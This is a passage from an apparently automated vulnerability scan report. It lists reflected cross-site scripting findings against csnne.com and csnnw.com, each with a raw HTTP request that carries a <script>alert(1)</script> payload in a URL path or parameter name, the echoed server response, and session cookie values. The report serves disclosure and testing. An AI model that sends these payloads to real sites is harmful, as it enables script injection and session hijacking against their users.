Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:57 GMT
Content-Length: 758
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pages8ad77<script>alert(1)</script>6b2cbf250f6/v3_video"</strong>
...[SNIP]...

2.366. http://www.csnne.com/pages/v3_video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /pages/v3_video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee131<script>alert(1)</script>53f0b12ef66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/v3_videoee131<script>alert(1)</script>53f0b12ef66 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:57 GMT
Content-Length: 777
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/v3_videoee131<script>alert(1)</script>53f0b12ef66"</strong>
...[SNIP]...

2.367. http://www.csnne.com/pages/v3_video [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /pages/v3_video

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1daf3"><script>alert(1)</script>aa23ecb918d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/v3_video?1daf3"><script>alert(1)</script>aa23ecb918d=1 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 77815
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:56 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="1daf3"><script>alert(1)</script>aa23ecb918d" id = "1daf3">
...[SNIP]...

2.368. http://www.csnne.com/pages/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /pages/video

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35cdf<script>alert(1)</script>2ff35bb459d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages35cdf<script>alert(1)</script>2ff35bb459d/video HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:58 GMT
Content-Length: 755
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pages35cdf<script>alert(1)</script>2ff35bb459d/video"</strong>
...[SNIP]...

2.369. http://www.csnne.com/pages/video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /pages/video

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92d33<script>alert(1)</script>01aa7fffa0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/video92d33<script>alert(1)</script>01aa7fffa0a HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:59 GMT
Content-Length: 774
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/video92d33<script>alert(1)</script>01aa7fffa0a"</strong>
...[SNIP]...

2.370. http://www.csnne.com/pages/video [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnne.com
Path:   /pages/video

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7663e"><script>alert(1)</script>9a93b141082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/video?7663e"><script>alert(1)</script>9a93b141082=1 HTTP/1.1
Host: www.csnne.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: base_domain_d4987ffea863a57509cd6a8810c955e4=csnne.com; __utmz=262035615.1292783182.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_d4987ffea863a57509cd6a8810c955e4=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=19305e613eff95a8ebf98a6202a7f4c0; __utma=262035615.896046343.1292783182.1292783182.1292783182.1; __utmc=262035615; __utmb=262035615;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 77943
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:58 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="7663e"><script>alert(1)</script>9a93b141082" id = "7663e">
...[SNIP]...

2.371. http://www.csnnw.com/common/ad_count.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /common/ad_count.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bda9a<script>alert(1)</script>ba56988bb13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /commonbda9a<script>alert(1)</script>ba56988bb13/ad_count.php HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:46 GMT
Content-Length: 763
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/commonbda9a<script>alert(1)</script>ba56988bb13/ad_count.php"</strong>
...[SNIP]...

2.372. http://www.csnnw.com/common/ad_count.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /common/ad_count.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a94d7<script>alert(1)</script>12e5eddf679 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/ad_count.phpa94d7<script>alert(1)</script>12e5eddf679 HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:46 GMT
Content-Length: 763
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/ad_count.phpa94d7<script>alert(1)</script>12e5eddf679"</strong>
...[SNIP]...

2.373. http://www.csnnw.com/common/dynrss/dynrss_5274_landing2_.rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /common/dynrss/dynrss_5274_landing2_.rss

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c75a1<script>alert(1)</script>c1d7133d4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /commonc75a1<script>alert(1)</script>c1d7133d4b/dynrss/dynrss_5274_landing2_.rss HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:48 GMT
Content-Length: 782
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/commonc75a1<script>alert(1)</script>c1d7133d4b/dynrss/dynrss_5274_landing2_.rss"</strong>
...[SNIP]...

2.374. http://www.csnnw.com/common/dynrss/dynrss_5274_landing2_.rss [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /common/dynrss/dynrss_5274_landing2_.rss

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 353b7<script>alert(1)</script>f719ed744a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/dynrss353b7<script>alert(1)</script>f719ed744a0/dynrss_5274_landing2_.rss HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:48 GMT
Content-Length: 783
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/dynrss353b7<script>alert(1)</script>f719ed744a0/dynrss_5274_landing2_.rss"</strong>
...[SNIP]...

2.375. http://www.csnnw.com/common/dynrss/dynrss_5274_landing2_.rss [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /common/dynrss/dynrss_5274_landing2_.rss

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9e62c<script>alert(1)</script>7655387658b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/dynrss/dynrss_5274_landing2_.rss9e62c<script>alert(1)</script>7655387658b HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:48 GMT
Content-Length: 783
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/dynrss/dynrss_5274_landing2_.rss9e62c<script>alert(1)</script>7655387658b"</strong>
...[SNIP]...

2.376. http://www.csnnw.com/common/global_flash/player/player.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6295<script>alert(1)</script>a48d9ccfc20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /commonf6295<script>alert(1)</script>a48d9ccfc20/global_flash/player/player.php HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:48 GMT
Content-Length: 781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/commonf6295<script>alert(1)</script>a48d9ccfc20/global_flash/player/player.php"</strong>
...[SNIP]...

2.377. http://www.csnnw.com/common/global_flash/player/player.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db088<script>alert(1)</script>7dc4a01b386 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flashdb088<script>alert(1)</script>7dc4a01b386/player/player.php HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:49 GMT
Content-Length: 781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flashdb088<script>alert(1)</script>7dc4a01b386/player/player.php"</strong>
...[SNIP]...

2.378. http://www.csnnw.com/common/global_flash/player/player.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eea4e<script>alert(1)</script>358c2f3c96f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/playereea4e<script>alert(1)</script>358c2f3c96f/player.php HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:49 GMT
Content-Length: 781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/playereea4e<script>alert(1)</script>358c2f3c96f/player.php"</strong>
...[SNIP]...

2.379. http://www.csnnw.com/common/global_flash/player/player.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca1fd<script>alert(1)</script>dfb0b59e48 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player/player.phpca1fd<script>alert(1)</script>dfb0b59e48 HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:50 GMT
Content-Length: 780
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player/player.phpca1fd<script>alert(1)</script>dfb0b59e48"</strong>
...[SNIP]...

2.380. http://www.csnnw.com/common/js/aggregate.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /common/js/aggregate.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a34c6<script>alert(1)</script>d4a1ecc00e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/js/a34c6<script>alert(1)</script>d4a1ecc00e3 HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:49 GMT
Content-Length: 754
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/js/a34c6<script>alert(1)</script>d4a1ecc00e3"</strong>
...[SNIP]...

2.381. http://www.csnnw.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99e5b<script>alert(1)</script>5fea6cf4743 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /99e5b<script>alert(1)</script>5fea6cf4743 HTTP/1.1
Host: www.csnnw.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:35:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:35:21 GMT
Connection: close
Content-Length: 744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/99e5b<script>alert(1)</script>5fea6cf4743"</strong>
...[SNIP]...

2.382. http://www.csnnw.com/pages/landing2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnnw.com
Path:   /pages/landing2

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ce55<script>alert(1)</script>1176dc7b761 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages9ce55<script>alert(1)</script>1176dc7b761/landing2 HTTP/1.1
Host: www.csnnw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
